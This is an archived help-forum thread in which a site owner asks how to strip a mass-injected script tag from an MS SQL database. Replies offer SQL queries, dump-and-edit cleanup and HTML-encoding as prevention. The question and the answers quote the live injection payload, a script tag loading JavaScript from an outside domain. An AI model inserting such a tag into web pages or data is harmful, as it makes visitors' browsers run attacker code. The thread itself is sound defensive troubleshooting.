Solved

Need to remove an 'unauthorized' script from database fields - help/suggestions

Posted on 2008-06-16
12
443 Views
Last Modified: 2013-11-15
Here's the deal, som jerk-offs infiltrated my website database with this:

<script src=http://www.clsidw.com/b.js></script>

They were able to insert this into some of the fields in my database, and my most recent backup was done after they did it, so I can't go back. Now, I need to get into the database and erase this entry in whatever fields they got into.

1 What is the fastest way to accomplish this?

2 What database software should I use keeping in mind I probably will never use it again, so cost IS a consideration.

3 Is there a way to clear this automatically or in a batch?

FWIW, they DID NOT overwrite the fields, they simply ADDED this to them.
0
Comment
Question by:bishopandsix
  • 6
  • 5
12 Comments
 
LVL 25

Expert Comment

by:Tomas Helgi Johannsson
ID: 21798262
        HI!

Have you tried Toad for MySQL (www.toadsoft.com) ?
It's free and very good DBA tool to make changes to your database.

What you can do is do an update on each table by and put a empty string in stead of the script string for fields that are
just chars / varchars.
With text fields (TEXT, MEDIUM TEXT, LONG TEXT) or BLOB fields  it might be a little more trickier.
What you can do is use mysqldump to dump the database(s) to an sql file and use
texteditor (like WordPad/Notepad if you use WIndows) to search and replace the script text with blanks
and then restore the database with the altered backup sql file.
See the manual for further info
http://dev.mysql.com/doc/refman/5.0/en/mysqldump.html

Regards,
   Tomas Helgi
0
 
LVL 7

Expert Comment

by:Zippit
ID: 21798294
this is a pretty standard attack against websites that allow HTML embedded into their comments.  If it's in comments and you don't mind just blowing away the offending comment (not other comments, just the one with the offending html in it), then something like the following will work (run this in a query tool):

DELETE FROM tbl_myComment_Table
WHERE str_text_field like '%http://www.clsidw.com/b.js%'


0
 

Author Comment

by:bishopandsix
ID: 21798300
I'm sorry, I think my Database is MS SQL, does Toad work with that? I am a complete beginner when it comes to database stuff.
0
 
LVL 7

Expert Comment

by:Zippit
ID: 21798303
If you are running ASP or ASP.NET it would be a good idea to HTMLEncode all user submitted input.  This will prevent this attack from working in the future.  Use a line like the following to do so:


userInput = Server.HtmlEncode(userInput)
0
 

Author Comment

by:bishopandsix
ID: 21798370
"this is a pretty standard attack against websites that allow HTML embedded into their comments.  If it's in comments and you don't mind just blowing away the offending comment (not other comments, just the one with the offending html in it), then something like the following will work (run this in a query tool):

DELETE FROM tbl_myComment_Table
WHERE str_text_field like '%http://www.clsidw.com/b.js%'"

If I do this, will it eliminate ONLY the added script, or will it eliminate everything in the field? Also, what software should I use to do this with?
0
 

Author Comment

by:bishopandsix
ID: 21798392
"If you are running ASP or ASP.NET it would be a good idea to HTMLEncode all user submitted input.  This will prevent this attack from working in the future.  Use a line like the following to do so:


userInput = Server.HtmlEncode(userInput)"

If I do this, will it still allow me to use HTML in some of my fields? What does this function do exactly.
0
Backup Your Microsoft Windows Server®

Backup all your Microsoft Windows Server – on-premises, in remote locations, in private and hybrid clouds. Your entire Windows Server will be backed up in one easy step with patented, block-level disk imaging. We achieve RTOs (recovery time objectives) as low as 15 seconds.

 
LVL 7

Accepted Solution

by:
Zippit earned 500 total points
ID: 21798790
The delete will delete all data in the entire affected record.  If the malicious script tag is in a comment you probably want to do that anyway.  If you just want to remove the "script" tag then you are going to need to write a program/script to loop through all your records and update the field with the value with the malicious script tag removed.

If you want to see what records will be deleted run the following:

SELECT *
FROM  tbl_myComment_Table
WHERE str_text_field like '%http://www.clsidw.com/b.js%'

You will need a query tool to run this against.  If you are using MSSQL then use either Query Analyzer or SQL Server Management Studio (they come with SQL Server Standard or Enterprise).
0
 
LVL 7

Expert Comment

by:Zippit
ID: 21798801

userInput = Server.HtmlEncode(userInput)"

If I do this, will it still allow me to use HTML in some of my fields? What does this function do exactly.

"YOU" can as the administrator.  But if you put that code in your comments submission code (or wherever the user's submitted the malicious script tags) then they will no longer be able to use HTML of any kind.

If you want them to be able to continue using HTML then you will have to write a "smart" filter that strips out possibly malicious tags like <script>.  But that's easier said then done.
0
 

Author Comment

by:bishopandsix
ID: 21799232
Still need some help with what software to use to accomplish the database cleaning. The database is MSSQL as far as I know.
0
 
LVL 7

Expert Comment

by:Zippit
ID: 21807259
what product are you using for your site?  If it's open source I will take a look for the schema and might be able to whip something up real quick.

Is the site hosted on your server or are you renting server space/web space?
0
 

Author Comment

by:bishopandsix
ID: 21808309
Absolutely no  idea what product. I'll get with my host in the morning and ask.
0
 

Author Closing Comment

by:bishopandsix
ID: 31467804
Thanks, your help got me going in the right direction and I was able to clean the records with only a slight amount of additional info I found by doing some Google searches.
0

Featured Post

U.S. Department of Agriculture and Acronis Access

With the new era of mobile computing, smartphones and tablets, wireless communications and cloud services, the USDA sought to take advantage of a mobilized workforce and the blurring lines between personal and corporate computing resources.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

Slowly Changing Dimension Transformation component in data task flow is very useful for us to manage and control how data changes in SSIS.
Load balancing is the method of dividing the total amount of work performed by one computer between two or more computers. Its aim is to get more work done in the same amount of time, ensuring that all the users get served faster.
Using examples as well as descriptions, and references to Books Online, show the different Recovery Models available in SQL Server and explain, as well as show how full, differential and transaction log backups are performed
Viewers will learn how to use the SELECT statement in SQL to return specific rows and columns, with various degrees of sorting and limits in place.

910 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question

Need Help in Real-Time?

Connect with top rated Experts

18 Experts available now in Live!

Get 1:1 Help Now